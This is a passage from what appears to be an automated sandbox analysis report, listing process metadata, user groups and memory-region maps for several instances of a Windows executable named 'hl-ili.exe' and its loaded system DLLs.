"\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18734 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 18735 start_va = 0x540000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 18736 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Thread: id = 143 os_tid = 0x67c Process: id = "22" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x4006f000" os_pid = "0x6c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18561 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18562 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18563 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18564 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18565 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18566 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18567 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18568 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18569 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18570 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18571 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18572 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18573 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18574 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18575 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 18769 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 18770 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 18771 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 18772 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18773 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 18774 start_va = 0x4a0000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Thread: id = 144 os_tid = 0x6c4 Process: id = "23" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x64374000" os_pid = "0xdd0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18581 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18582 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18583 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18584 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18585 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18586 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18587 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18588 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18589 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18590 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18591 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18592 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18593 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18594 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18595 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 18775 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 18776 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 18777 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 18778 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18779 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 18780 start_va = 0x4a0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 18781 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Thread: id = 145 os_tid = 0xa38 Process: id = "24" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x66579000" os_pid = "0x610" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18615 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18616 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18617 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18618 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18619 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18620 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18621 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18622 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18623 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18624 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18625 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18626 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18627 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18628 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18629 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 18815 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 18816 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 18817 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 18818 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18819 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 18820 start_va = 0x4a0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 18821 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18822 start_va = 0x74e60000 end_va = 0x74fddfff monitored = 0 entry_point = 0x74f11b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Thread: id = 147 os_tid = 0x60c Process: id = "25" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x65a7e000" os_pid = "0x8a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18635 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18636 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18637 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18638 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18639 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18640 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18641 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18642 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18643 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18644 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18645 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18646 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18647 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18648 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18649 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 18823 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 18824 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 18825 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 18826 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18827 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 18828 start_va = 0x590000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 18829 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18830 start_va = 0x74e60000 end_va = 0x74fddfff monitored = 0 entry_point = 0x74f11b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Thread: id = 148 os_tid = 0xc34 Process: id = "26" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x5ef83000" os_pid = "0x6c0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18656 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18657 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18658 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18659 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18660 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18661 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18662 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18663 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18664 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18665 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18666 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18667 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18668 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18669 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18670 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 18833 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 18834 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 18835 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 18836 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18837 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 18838 start_va = 0x550000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 18839 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18840 start_va = 0x74e60000 end_va = 0x74fddfff monitored = 0 entry_point = 0x74f11b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Thread: id = 149 os_tid = 0xd9c Process: id = "27" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x66088000" os_pid = "0x748" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18677 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18678 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18679 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18680 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18681 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18682 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18683 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18684 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18685 